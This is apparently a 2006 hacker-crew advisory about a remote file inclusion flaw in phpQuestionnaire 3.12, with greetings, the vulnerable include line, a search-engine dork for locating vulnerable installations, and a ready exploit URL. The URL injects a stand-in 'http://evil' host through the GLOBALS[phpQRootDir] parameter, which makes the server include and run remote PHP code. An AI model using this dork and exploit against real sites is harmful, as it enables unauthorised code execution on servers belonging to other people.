#############################SolpotCrew Community################################
#
# phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion
#
# vendor : http://http://www.chumpsoft.com/products/phpq/
#
########################################################################
#########
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)
#
# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]
#
# Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt
#
########################################################################
########
#
#
# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^
# and all member solpotcrew community
# especially thx to str0ke @ milw0rm.com
#
########################################################################
#######
Input passed to the "GLOBALS[phpQRootDir]" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from inc/ifunctions.php
########################################################################
########
# phpQuestionnaire Version 3.12 #
# Copyright 2003-2006 chumpsoft, inc. August 7, 2006 #
# http://www.chumpsoft.com/products/phpq/ support (at) chumpsoft (dot) com [email concealed] #
########################################################################
########
# Use of this program constitutes your agreement to the terms contained in the #
# LICENSE file within this distribution. #
########################################################################
########
include($GLOBALS["phpQRootDir"] . "inc/tableformat.php");
function ImportSurvey ($fp, $type, $flag) {
set_time_limit(600); # Attempt to disable time limit in case upgrade takes long
google dork : "phpQuestionnaire v3"
exploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQ
RootDir]=http://evil
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F#############################
#####